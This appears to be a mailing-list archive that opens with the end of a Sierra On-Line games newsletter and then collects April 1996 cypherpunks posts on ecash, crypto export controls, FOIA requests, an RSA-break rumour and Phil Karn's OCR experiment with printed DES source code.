Never got around to dogfighting those German aces?  Somehow neglected to find time to build that worldwide automobile manufacturing empire?  Spent the last two years sitting on your butt instead of getting out there and saving the environment?  GREAT!  It's always nice to meet a fellow procrastinator, so we'd like to reward your tardiness with fabulous prices on the games you missed out on.   We call them the SierraOriginals, and we're selling them for dirt-cheap.  $14.95 will get you any of these titles on CD-ROM:  Red Baron (plus a free copy of A-10 Tank Killer), Detroit, EcoQuest: The Search for Cetus, The Even More Incredible Machine, Quest for Glory IV, King's Quest VI, Leisure Suit Larry in the Land of the Lounge Lizards (and this isn't the old type-`til-you-bleed version either, but the updated point-and-click interface), Gobliiins, Gobliins 2 (yes, the preceding two titles do indeed contain the correct number of "i"s), my personal favorite (for sheer mayhem value), The!
!
 Incredible Toon Machine, or just a mess of other titles.  You can find them in your local software store,  or order them directly from our website's online store or from the legion of telephone customer service representatives at 1-800-SIERRA5.  Then you can tell that third-grade teacher who used to lecture you about punctuality that you paid about thirty bucks less per game than she did.

          http://www.sierra.com/games/originals/index.html


ONE MORE THING
~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~  
If you're anything like me, the one thing better than dirt-cheap games is free games, so I'll throw a few of those in here as well.  I just so happen to have a big batch of SierraOriginals titles sitting at my desk (got them through the departmental budget by calling them "research materials") and I'm holding a contest to give `em away.  And since I hate random drawings (since they involve no thought) and essay contests (since I'd have to read all your entries, and I do have somewhere I need to go this year), we're going to do this a little bit differently.  One of the SierraOriginals is "Leisure Suit Larry in the Land of the Lounge Lizards."  There are a lot of letters in that game title, and if they were in a different order, it stands to reason that they'd make other words and sentences.  What I'm looking for is the most creative sentence which can be made from the letters in the game title.  You don't have to use all of the letters, but each letter can only be used once (t!
!
here's only one "g" in the title, so there'd better only be one "g" in the sentence).  You may use as much punctuation as you need.  Send your sentences to PRIZE@SIERRA.COM.  Whichever entry I think is the coolest (that's right, just me, no panel of impartial judges, sorry) wins your choice of any FIVE SierraOriginals games.  That should keep you busy for a while.

And that's about everything I can fit into one issue.  Fun info next month on Betrayal In Antara and the Mac version of Space Quest 6, so stay tuned, and happy gaming!

~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~  

Visit the Sierra On-Line website at:
   http://www.sierra.com

To unsubscribe from this newsletter:
   UNSUBSCRIBE@SIERRA.COM
Please remember to put your e-mail address all by itself in the Subject: line when you try to unsubscribe, or (guess what?) it won't work.

Comments?  Suggestions?  Family recipes for lasagna?  Great!  Just send them to CindyV, at the following address: CINDYV@SIERRA.COM
If the volume of mail is staggering, it may take me a day or two to reply, but I will answer each and every e-mail, because your comments are important to us (and also because I'm a certified e-mail junkie, just one step away from E-Mailers' Anonymous). 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 3 Apr 1996 13:22:42 +0800
To: cypherpunks@toad.com
Subject: Re: What backs up digital money?
Message-ID: <199604021611.IAA08188@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: "FRank O. Trotter, III" <fotiii@crl.com>
> Ecash is a means of transferring value, currently USD at Mark Twain,
> betweeen parties.  Ecash, however denominated, is not a currency in
> itself.

I am curious to know why you say that ecash is not a currency.  One of
the main points of my original posting was to challenge this view.

Do you simply mean that this is a matter of definitions, that ecash isn't
a currency because it lacks some property X that, by definition, a
currency must have (such as, it must be issued by a national government)?

Or are you saying that there is an important functional difference, that
ecash cannot be used as we normally use currency (that is, the dollar
bills and coins in our pockets) because of reason X?  If so I would like
to hear what you think that reason is.  The one I have seen mentioned
previously is transferrability, so I discussed this in my original
message.

> The value unit or currency has value because people agree it has
> value.  CyberBucks were (and still are) somewhat convertable to
> tangible goods - they are for sure convertable to intrinsic goods as
> demonstrated by the CyberBucks trial.  USD and DEM have value only
> because we all accept them as payment - as fiat currencies there is no
> formal backing.  Gold has value because ...

The whole issue of why dollars have value is one which is poorly
understood, IMO.  There are several reasons, which are inter-related.
One of the big ones is that they are legal tender.  This term does not
mean what a lot of people think it does, but at least it means that
your dollars carry certain legal weight if you have a debt that you
need to pay off.  Another reason dollars are accepted is because you
know you can pay your taxes with them.  This is something that most
people have to do, and dollars are something they can do it with.

Another factor is that there are long term contracts, such as
mortgages, which are denominated in dollars.  You can use your dollars
to pay off your debt at the bank, and the bank is contractually bound
to accept them (even apart from legal tender considerations), and grant
you title to tangible property in return.  Interestingly, the volume of
outstanding mortgages is of the same order of magnitude as the
circulating money supply.  I know someone who claims that this is the
most important factor in giving dollars value.

And finally, the reason that most people think of, the fact that
everyone around them accepts dollars, and presumably will do so in the
future.  I don't actually think this is as strong as the others, since
there is no guarantee that people won't change their minds, and in fact
there have been historical situations where due to hyper inflation
merchants have come to view government money as almost worthless.  So
since these people haven't committed to accept the money, this
grounding is not that strong.  I think the earlier examples are more
important as an ultimate grounding, although they are not cited as
frequently.

> Ecash puts banks back into the business of being banks - acting as a
> storehouse of value, and as a means to transfer this value, all for a
> fee.  The early bank models were exclusively along these lines, with
> the various lending and investing functions added later.

I would expect that an ecash issuing bank would make ecash loans just as
it makes other forms of loans.  So I don't see ecash as making this
kind of difference in a bank.  Just because a bank issues ecash it's
not going to roll back the clock to the 18th century.

One of the big advantages of multiple ecash currencies is that it turns
out that there is automatic control of inflation.  A bank which issues
too much currency (relative to its reserves) will find it becoming worth
less because it is trusted less.  There is an automatic balancing act.

We see the same thing in the international currency markets with
government currencies.  In the olden days, when international trade was
less important, a government could inflate without feeling much pain.
But today its currency will lose value, which will hurt its balance of
trade and make it hard to acquire foreign goods.  So this puts a brake on
the ability of governments to play games with the money supply.  The same
factor would be expected to occur with private currencies.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 3 Apr 1996 17:07:49 +0800
To: ddt@lsd.com>
Subject: Re: Test case for RSA t-shirts
Message-ID: <m0u49Tt-00092LC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:33 AM 4/2/96 -0800, Jeff Weinstein wrote:
>Dave Del Torto wrote:
>> 
>> At 1:08 pm 3/30/96, Raph Levien wrote:
>> >   While we're on the subject, I called Sam Capino's office regarding my
>> >CJR for this t-shirt, and he said they were still waiting for a response
>> >from the NSA. I think my next move will be a letter asking exactly when
>> >I can expect a response, and whether there's anything I can do to compel
>> >a response, It was originally filed (in October) as a 15-day expedited
>> >review.
>> 
>> FYI, PRZ mentioned to me last night that the CJR on the OCR-able book of
>> PGP source is still pending. The "15 days" has stretched into about a year
>> in that case, if I don't have my dates/the facts wrong. Bob Prior at MIT
>> would know.

I'm trying to figure out what the difference is (legal) between a "book" an 
an "OCR-able" book.  FAIK, all fonts are OCR-able, simply with widely 
varying degrees of difficulty.  A fixed-spacing, non-microspace justified 
typewriter font is probably one of the easiest ones to OCR.   Did the export 
license application for this "OCR-able" book say that "It's an OCR-able" 
book, or did they just include a copy of that book on paper?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 3 Apr 1996 18:03:17 +0800
To: cypherpunks@toad.com
Subject: Re: Witch Hunts
Message-ID: <m0u49lt-00093PC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:55 PM 4/1/96 EST, Dr. Dimitri Vulis wrote:
>Bruce Zambini <jlasser@rwd.goucher.edu> writes:
>> On Sun, 31 Mar 1996 JonWienke@aol.com wrote:
>> > Unicorn = Detweiler = Agent Provocateur
>>
>> Well, I won't say it's impossible.
>
>Don't you get the hint -- Unicorn == Sir Lancelot == Lance.

Hey, I never thought of that!  I guess my knowledge of early English mythology is a bit weak.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lindsay Haisley <fmouse@fmp.com>
Date: Wed, 3 Apr 1996 11:11:40 +0800
To: cypherpunks@toad.com
Subject: Re: (fwd) Russians Break RSA? (fwd)
Message-ID: <199604021527.JAA05958@gateway.fmp.com>
MIME-Version: 1.0
Content-Type: text/plain


Would someone be kind enough to forward me the original article on this?

"Thus spake Jim Choate"
> 
> This is true. I read about it in The Spotlight. Or was it libernet?
> 
> -rich
>  Visit Propaganda on the Barbie!
>  http://www-leland.stanford.edu/~llurch/potw2/
> 


-- 
Lindsay Haisley          | "Everything works     |   PGP public key
FMP Computer Services    |       if you let it"  |   available via
fmouse@fmp.com           |    (The Roadie)       |   Internet finger
http://www.fmp.com       |                       |




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Wed, 3 Apr 1996 08:57:07 +0800
To: jlasser@rwd.goucher.edu>
Subject: Re: Witch Hunts
In-Reply-To: <Pine.SUN.3.91.960331160359.9821B-100000@rwd.goucher.edu>
Message-ID: <YlMHejC00YUvA5WMcs@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 31-Mar-96 Witch Hunts by Bruce
Zambini@rwd.gouche 
> effective, critical technique. (This is, in fact, one reading of De 
> Sade's "pornography" -- an interesting counterexample to what was 
> trumpeted on _Both_ sides of the recent Firing Line debate: that 
> pornography or obscenity is, whether or not protected, devoid of any 
> intellectual content.)

That's not entirely true. The ACLU's position, as provided by Ira
Glasser at the debate, is that pornography is not a legal term d'art,
that it is presumptively protected by the First Amendment, and
furthermore that sexually explicit images are not necessarily harmful to
minors.

The difference between "porn" and "obscenity" is intellectual content.

-Declan
(Not speaking for the ACLU)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Robert LoVerso <john@loverso.southborough.ma.us>
Date: Wed, 3 Apr 1996 10:52:00 +0800
To: jsw@netscape.com
Subject: Re: caching of form posts in netscape (was:(none))
In-Reply-To: <3160E338.1805@netscape.com>
Message-ID: <199604021516.KAA08671@loverso.southborough.ma.us>
MIME-Version: 1.0
Content-Type: text/plain


> This next beta will also include several other security/privacy related
> features/preferences:

> 2) Warning dialog on "mailto:" form posts

Also add a warning dialog on any form post that includes a file upload.
This will prevent any re-occurance of the JavaScript bug I was about
to exploit in 2.01 that let code upload files without the user's knowledge.
(That particular bug is fixed in 3.0b2).

John




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rodger@interramp.com
Date: Wed, 3 Apr 1996 11:41:13 +0800
To: "Declan B. McCullagh" <cypherpunks@toad.com
Subject: Re: Cypherpunks investigated, FOIA?
Message-ID: <199604021537.KAA10355@smtp1.interramp.com>
MIME-Version: 1.0
Content-Type: text/plain


If it's been done, it won't likely make any difference. Information that would 
affirm or refute the existence of an investigation by law enforcement is 
exempt from FOIA.
Will Rodger
Interactive Week


<---- Begin Included Message ---->
Date: Tue,  2 Apr 1996 00:26:29 -0500 (EST)
From: "Declan B. McCullagh" <declan+@CMU.EDU>
To: cypherpunks@toad.com
Subject: Cypherpunks investigated, FOIA?
Cc: sgs@well.com

>From sgs@well.com:


 Have the cypherpunks requested data on whether they are being investigated
 by the same agencies under the FOIA individually or as a group listed by
 that name? If so, what are the results, if any, so far?


Does anyone know if this has been done? The FOIA, that is.

-Declan


<---- End Included Message ---->





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stillson@ashd.com (Chris Stillson)
Date: Wed, 3 Apr 1996 14:00:55 +0800
To: cypherpunks@toad.com
Subject: Re: (fwd) Russians Break RSA?
Message-ID: <199604021654.KAA17128@bach.ashd.com>
MIME-Version: 1.0
Content-Type: text/plain


at Kryptogorodok, the secret city of Soviet cryptographers
>hidden in the Urals (and first visited by an outsider, Stephen
>Wolfram, only a couple of years ago).
>


Nice touch. I worked at Wolfram Research a few years ago, and wolfram actually was in Russia for a tour.

Chris

############################################
Chris Stillson
Chief Rocket Scientist
Resident Web Geek
Hip Young Nerd
Second Rate graphic designer
Unix Guru
In other words, Webmaster
American Software & Hardware Distributors
fluffy@ashd.com
Check out our web site-> http://www.ashd.com
Cause I did it all....
stop the CDA. Check
http://www.eff.org
############################################






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 3 Apr 1996 16:33:04 +0800
To: "Dave Banisar" <cypherpunks@toad.com>
Subject: Re: ACM/IEEE Letter on Crypto
Message-ID: <m0u4Bhn-0008xuC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:24 PM 4/1/96 -0500, Dave Banisar wrote:
>              Association For Computing Machinery
[address deleted]
>      Institute of Electronics and Electrical Engineers
[address deleted]
>April 2, 1996
[thank heavens it wasn't April 1!]
>Honorable Conrad Burns
>Chairman, Subcommittee on Science, Technology and Space
[etc]
>Dear Chairman Burns:
>
>	On behalf of the nation's two leading computing and engineering 
>associations, we are writing to support your efforts, and the efforts of 
>the other cosponsors of the Encrypted Communications Privacy Act, to 
>remove unnecessarily restrictive controls on the export of encryption 
>technology.  The Encrypted Communications Privacy Act sets out the 
>minimum changes that are necessary to the current export controls on  
>encryption technology.  However, we believe that the inclusion of issues 
>that are tangential to export, such as key escrow and encryption in 
>domestic criminal activities, is not necessary.  The relaxation of 
>export controls is of great economic importance to industry and users, 
>and should not become entangled in more controversial matters.

As far as it goes, and considering that it's from an industry group, this 
sounds like an excellent response to this Burns bill proposal.  (Not "Bill," 
because it's still not available, apparently.)  This response is probably as 
close as we can expect to a repudiation of the Leahy bill.  It still isn't 
clear, though, whether the Burns bill is intended to be just an elimination 
of export controls on encryption, or whether it will contain other provisions.

My question, which still hasn't been answered, is:  "Does this bill exist 
yet?"  The answer is really not inconsequential, because if it _isn't_ at 
least sketched out yet, then that either should give us the opportunity to 
add provisions we want, or alert us that there is still the risk from 
Denning-types of including provisions we don't want.  Either way, action is 
called for, if only action to keep somebody else from taking action.  

I don't have any objection to a bill which merely eliminates export 
requirements on encryption; that would be a substantial step in the proper 
direction.  If that's the best we can do for this session of Congress, I 
hope we can achieve this as a stepping-stone. 


Jim Bell
jimbell@pacifier.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Aldrich <maldrich@grctechs.va.grci.com>
Date: Wed, 3 Apr 1996 14:23:30 +0800
To: jim bell <jimbell@pacifier.com>
Subject: J Bell's Moniker (WAS: Re: NYT on CFP)
In-Reply-To: <m0u3s9n-0008zMC@pacifier.com>
Message-ID: <Pine.SCO.3.91.960402120438.10158F-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 1 Apr 1996, jim bell wrote:

<snip>
> >   The proposal drew some opposition. "I think we'll regret it
> >   down the road," said Dorothy E. Denning, a professor of
> >   computer sciences at Georgetown University and a computer
> >   security consultant to the military. Dr. Denning and others
> >   have argued that the use of unrestricted encryption would
> >   thwart the ability of law-enforcement and intelligence
> >   agencies to conduct wiretaps on messages sent by foreign
> >   spies, terrorists, child pornographers and other criminals.
> 
> Damn!  They keep leaving me out of their short list!  Maybe they meant to 
> lump me in with the groups they mentioned.  I'm an American, so I can't be a 
> "foreign spy," and my supply of child pornography is at a constant zero 
> level.   I'd sure hate to be lumped into an ignominious position with the 
> "other criminals," however:  What an unimpressive title!
> 
> Maybe I'll just have to settle for being called a terrorist. Harrumph!

OK, Jim, I'll take the bait:

What, per chance, _DO_ you want to be called?

------------------------------------------------------------------------- 
|      Liberty is truly dead              |Mark Aldrich                 | 
|    when the slaves are willing          |GRCI INFOSEC Engineering     | 
|     to forge their own chains.          |maldrich@grci.com            | 
|        STOP THE CDA NOW!                |MAldrich@dockmaster.ncsc.mil | 
|_______________________________________________________________________| 
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     | 
|         and my employer gets no credit for them whatsoever.           | 
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: foodie@netcom.com (Jamie Lawrence)
Date: Wed, 3 Apr 1996 16:19:58 +0800
To: cypherpunks@toad.com
Subject: (fwd fyi) SecureNet to allow classified data on the I'net??
Message-ID: <v02140b01ad873ce03f77@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Date: Mon, 1 Apr 1996 17:11:21 -0800

From: jwarren@well.com (Jim Warren)
Subject: (fwd fyi) SecureNet to allow classified data on the I'net??

For whatever it's worth -- from an unknown source inside a govt lab,
forwwarded to me by an outside friend.  Distribute freely, as far as I'm
concerned.

--jim
Jim Warren, GovAccess list-owner/editor (jwarren@well.com)
Advocate & columnist, MicroTimes, Government Technology, etc.


A "Superlab" linking the computational resources of four national laboratories
has come a big step toward becoming a reality with the opening of SecureNet --
a network for transmitting secret and classified data over the Internet. Bing
Young, who led the Lab's part in the project, says the new network is still
only a "dirt road" able to transmit data at 1.5 megabits/second. However, he
says new encryption technologies will bring the network up to information
superhighway speeds over the next year.

Young will discuss SecureNet in a presentation at 10 a.m., Wednesday, April
3, in Bldg. 113, room 1104. Green-badge employees only. The Department of
Energy gave approval in March for the network developed by the Lab, Los
Alamos and the two Sandia laboratories to improve scientific collaboration
in Stockpile Stewardship programs.

--- end forwarded text







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kauto Huopio <huopio@lut.fi>
Date: Wed, 3 Apr 1996 07:48:10 +0800
To: cypherpunks@toad.com
Subject: ssh won the Sampo Data Security Prize!
Message-ID: <Pine.HPP.3.91.960402135318.7932B-100000@cc.lut.fi>
MIME-Version: 1.0
Content-Type: text/plain


The local TV news just announced that Tatu Ylonen won the Sampo Insurance 
Company's Data Security Prize 1996. Ssh will have a lot of good publicity 
here in Finland..

--Kauto

*********************** Kauto Huopio (Kauto.Huopio@lut.fi) ******************
*Mail: Kauto Huopio, Laserkatu 3 CD 363, FIN-53850 Lappeenranta, Finland    *
*Tel : +358-53-4126573, GSM(mobile): +358-40-5008774		 	    *
*****************************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 3 Apr 1996 16:35:42 +0800
To: Mark Aldrich <maldrich@grctechs.va.grci.com>
Subject: Re: J Bell's Moniker (WAS: Re: NYT on CFP)
Message-ID: <m0u4EPi-00091kC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:06 PM 4/2/96 -0500, Mark Aldrich wrote:
>On Mon, 1 Apr 1996, jim bell wrote:

>> Damn!  They keep leaving me out of their short list!  Maybe they meant to 
>> lump me in with the groups they mentioned.  I'm an American, so I can't be a 
>> "foreign spy," and my supply of child pornography is at a constant zero 
>> level.   I'd sure hate to be lumped into an ignominious position with the 
>> "other criminals," however:  What an unimpressive title!
>> 
>> Maybe I'll just have to settle for being called a terrorist. Harrumph!
>
>OK, Jim, I'll take the bait:
>
>What, per chance, _DO_ you want to be called?

What I was trying to suggest, in a suitably humorous way, is the fact that 
the government really isn't concerned about these "bad guys," and in fact is 
(or, ought to be) more worried about technological developments that will 
(and should!) make governing populations increasingly difficult.  It doesn't 
want to admit this, but that's still the truth.  I'm sure they have advisors 
who are telling them what is going to occur, and if they're at all on the 
ball they're desperately working to try to figure out if these eventualities 
can be prevented.  

I don't think they'll be successful, but it is still possible to identify 
many of their efforts such as the Clipper I and Clipper II proposals, both 
of which were abject failures, and the Digital Telephony bill, which despite 
the fact it passed has not been funded, and others.  I view the Leahy bill 
as a somewhat more "realistic" proposal in this series, in the sense that 
they got a bit smarter about their proposals, putting some tasty bait in the 
trap.  It's still a trap.

I was also trying to point out that when the government views just about all 
its enemies as "foreign spies, child pornographers, other criminals and 
terrorists," its task is to fit all the people who are REALLY dangerous to 
it into one of these pre-defined molds.  I am reminded of the saying, "When 
the only tool you have is a hammer, you begin to treat all problems as if 
they are nails."

So I wonder what kind of "nail" I'm going to be.

One last thing:  I don't really know what I'd like to be called, but maybe 
"the last revolutionary" is appropriately melodramatic.  Because what I'm 
promoting will be, literally, the LAST revolution society will ever need.


Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: me@muddcs.cs.hmc.edu (Michael Elkins)
Date: Wed, 3 Apr 1996 15:28:10 +0800
To: cypherpunks@toad.com
Subject: software with "hooks" for crypto
Message-ID: <199604022231.OAA10821@muddcs.cs.hmc.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hello all,

I'm trying to figure out exactly what the laws are regarding the export of
software which contains "hooks" for PGP.  In various forms, I've heard
that it's not the ITAR which prevents this, but more a "suggestion" by
the NSA that we "shouldn't do it."  Does anyone have any pointers to
real legislation/laws regarding this?

Also, since we all know that our gov't thinks it perfectly legal to export
source code in hardcopy form (albeit with a license, right?) I was wondering...
I've written a Unix e-mail client which contains support for PGP/MIME and
also a front end for mixmaster.  Right now I basically reap all the "bad"
code before I distribute it (at _least_ 50% of my testers are outside the
US).  However, this has been annoying for those users because they want
to be able to use the PGP support (so do I!).  So, what I'm wondering is
what the laws are regarding snail-mailing source code to these people.
The actually pgp/remailer stuff isn't more than a few pages of code, which
could easily be transcribed or scanned in with OCR software.  Would I
have to get a "license for export" in order to send the code outside the
US?

It's worth the $1.00 it would cost to do this if it really is legal...

me
--
Michael Elkins <me@cs.hmc.edu>			http://www.cs.hmc.edu/~me
PGP key fingerprint = EB B1 68 32 3F B5 54 F9  6C AF 4E 94 5A EB 90 EC




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Date: Wed, 3 Apr 1996 16:57:53 +0800
To: (Recipient list suppressed)
Subject: New Internet Security Survey
Message-ID: <9604022119.AA27542@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


         LAS VEGAS, Nevada, April 1 (Reuter) - The overwhelming  
majority of America's top corporate high tech users will have 
implemented some Internet strategy over the next 12 months, 
although worries over security and distracted workers persist. 
         A survey of 500 leading U.S. networking users found that 89  
percent expect to have implemented strategies for using Internet 
technologies in internal corporate networks -- known as 
intranets -- by the end of the next 12 months. 
         But 70 percent believe employees use the Internet for  
entertainment on company time and 54 percent are worried about 
the security of information they exchange over the Internet. 
         A preview of the Network World 500 Internet study  
"Networking in the Cyber Age," jointly conducted by Network 
World and International Data Corp, was due to be released here 
on Tuesday at the NetWorld+Interop trade show. 
         A significant portion of respondents -- 28 percent --  
already make some use of Internet or intranet applications for 
making transactions in electronic commerce with customers, while 
48 percent plan to do so in the next 12 months. 
         "As networking enters the cyber age, it will create new  
electronic commerce oppertunities on the Internet, increasing 
general acceptance and demand," Network World president and 
chief executive Colin Ungaro said in a statement. 
         Among the top five general Internet trends, 83 percent of  
respondents said they use the Internet for communications -- 
email and file sharing, while 78 percent said they use it for 
research, such as accessing electronic information. 
         A majority of 55 percent said they access the Internet  
several times a day, and that most spend five to 30 minutes per 
session on-line using the global computer network. 
         An overwhelming majority of 85 percent of respondents said  
they have Web servers in their organizations for Internet 
applications, and 73 percent for intranet use -- while 88 
percent said new services will make public carriers more 
important to their company's enterprise network strategies. 
         Fully 69 percent said they have remote access to local area  
networks for more than 200 employees. 
         "The study demonstrates how quickly corporate America has  
become acclimated to Internet technologies," said John Gallant, 
editor-in-chief of Network World. 
         The annual telephone survey polled 500 U.S. network users  
whose companies have internetworked local area networks and wide 
area networks and annual network expenditures of more than $5 
million, with more than 1,000 employees. 
         -- Silicon Valley Bureau +1 415 462 2610  
                

_______________________
Regards,            Those who would have nothing to do with thorns must 
                    never attempt to gather flowers.
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      0C 69 D4 E8 F2 70 24 33  B4 5E 5E EC 35 E6 FB 88





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Wed, 3 Apr 1996 09:12:42 +0800
To: cypherpunks@toad.com
Subject: Please ignore this message
Message-ID: <199604021427.QAA23645@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Test of remailer at utopia.hacktie.nl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "D.A. Wagner" <daw27@newton.cam.ac.uk>
Date: Wed, 3 Apr 1996 16:40:30 +0800
To: jamesd@echeque.com
Subject: Re: Chaumian ecash without RSA
In-Reply-To: <199604021544.HAA26145@dns2.noc.best.net>
Message-ID: <199604021555.QAA16166@jordan.newton.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> 1:  A coin is almost twice the size of a coin in the RSA protocol

Nah, it can be the same size as in the RSA-based Digicash protocol.
(Pick x to be 128 bits, and repeatedly iterate SHA to get a 1024
bit y value, like Digicash does in their RSA-based Chaumian protocol.)

> 2:  Nobody except the bank can verify that a coin has face validity.

So your comment makes me glad I posted the scheme (even if it turns
out to be only of academic interest :-).

I claim that statement 2 is also true of Digicash's protocol as well.

Recall that Digicash is using an *online clearing* protocol-- so you
can't tell whether a coin is valid without consulting the bank.
Consulting the bank is absolutely necessary to prevent double spending.

So if you ever wrote an application which made a security-critical
decision based on whether the RSA signature verified correctly in the
Digicash protocol, and you didn't consult the bank re: double spending,
you'd be 100% vulnerable to a simple double spending attack.

In particular, I claim that the only reason the bank needs to publish
its RSA public exponent e is to allow you to blind the RSA signature:
it's specifically *not* intended for you to verify coin validity.

Everyone, feel free to jump in correct me if you disagree.

> For computer mediated management of contracts, transactions, and 
> credit ratings, we need contracts such that all intermediate 
> transactions can be reduced to locally verifiable cryptographic 
> protocols.

Well, if that's what you want, no currently shipping protocol gives
you that.  The current Digicash protocol does *not* let you do offline
clearing.

I don't claim to be able to solve the offline clearing problem; I just
hoped to point out that there is/(seems to be) nothing special about RSA.
(Indeed, one researcher has kindly emailed me to point out that several
well-known digital cash schemes use a El Gamal-based protocol.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 3 Apr 1996 18:59:47 +0800
To: cypherpunks@toad.com
Subject: Re:  software with "hooks" for crypto
Message-ID: <199604030147.RAA10970@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: me@muddcs.cs.hmc.edu (Michael Elkins)
> I've written a Unix e-mail client which contains support for PGP/MIME and
> also a front end for mixmaster.  Right now I basically reap all the "bad"
> code before I distribute it (at _least_ 50% of my testers are outside the
> US).  However, this has been annoying for those users because they want
> to be able to use the PGP support (so do I!).  So, what I'm wondering is
> what the laws are regarding snail-mailing source code to these people.
> The actually pgp/remailer stuff isn't more than a few pages of code, which
> could easily be transcribed or scanned in with OCR software.  Would I
> have to get a "license for export" in order to send the code outside the
> US?

Let me first point out that this procedure is not as easy as it sounds.
Phil Karn has an interesting description of what happened when he
actually tried to do this, as part of his suit to try to export the
Applied Cryptography source code on disk.  It is at <URL:
http://www.qualcomm.com/people/pkarn/export/karndecl.html >.  This is
something that people have talked about for a long time, and it is
interesting to see what happened when he tried it:

   5. I began by first photocopying, on a standard office photocopier,
   the 18 pages containing the Triple DES source code listing from Part V
   of the Book. This took about 5 minutes. Second, I scanned in the 18
   sheets on a Macintosh Quadra 610 computer system equipped with an HP
   ScanJet II flatbed scanner and Omnipage Professional optical character
   recognition (OCR) software. The computer, scanner, and software are
   all readily available through normal consumer computer supply
   channels. The total scanning process took about one and a half hours.
   About an hour of this time was spent learning to use the scanning
   system and conducting trial runs, as I had only used it briefly some
   time ago. The actual scan of the 18 pages took about 15-20 minutes.
   Third, I transferred the resulting machine-readable file from the
   Macintosh to my own personal computer and brought it up under GNU
   EMACS, a popular and widely available text editing program that I have
   used for many years. In EMACS I compared, by eye, the scanned file
   displayed on my screen against the printed listing in the Book. I
   began correcting the scanner's many errors, such as mistaking the
   digit '0' for the letter 'O' or mistaking the vertical bar '|' for the
   letter 'I'.
   
   6. After manually correcting those errors noticed through visual
   comparison with the Book, I invoked the "C" language compiler on the
   (partially) corrected file. The compiler immediately pointed out
   additional errors I had overlooked in my visual inspection so I could
   also correct them by reference to the Book. I also noticed several
   errors in the listing printed in the Book. However, the programmer's
   intentions were obvious from the context of each error and were easily
   fixed. About fifty minutes later, I successfully compiled the file
   without error.
   
   7. The fourth step was to write a small test program to execute the
   DES code with the test vectors given at the end of the source code
   listing. This trivial program took less than 5 minutes to write.
   Unfortunately, the test did not succeed, meaning that at least one
   error went undetected by the compiler in either the code as printed in
   the Book or as scanned. Scrutinizing the code more closely, I quickly
   found another error in the printed version that was easily corrected.
   However, it still did not produce correct results. After about an hour
   of searching, I finally located the error in a list of numbers in a
   table -- another error in the printed version. By reference to the DES
   algorithm description in the first part of the Book, which includes
   the correct numbers in tabular form, I found and corrected the error.
   
   8. At this point the test finally succeeded, so I knew I had a correct
   program.

As you can see, it took a long time.  Part of the problem was that the
printed copy of the code was apparently simply wrong.  Presumably if you
printed it this would not be the case.  Also, your code is shorter than
the 18 pages that Phil had to work with.  Still OCR may not be that well
adapted to source code.  Most texts use ( a lot more than {, and the OCR
may not pick out that kind of difference well.

I will also note, parenthetically, that it is a credit to Phil that he
was obviously being very honest and above-board in describing what he
had to go through, possibly to his (and our) own detriment.  If the
process of turning the book into the floppy were easier and did not
appear to require so much expertise, the government's case might have
been weakened.

Your bigger question is about the legalities of it, and that is harder to
answer.  There is a continuum of cases.  At one end we can say that
it is apparently legal to discuss cryptographic algorithms with
foreigners.  This happens all the time at international conferences.  As
long as the material isn't classified, you can talk about the technical
issues.  At the other end, it is at present definitely illegal to export
a working cryptographic device.  In between there is a gray area.

Currently it appears that exporting cryptographic source code in machine
readable form on magnetic media is illegal, at least pending some
resolution of the Karn suit.  Probably exporting it in other ways, such
as by email, would be treated the same.

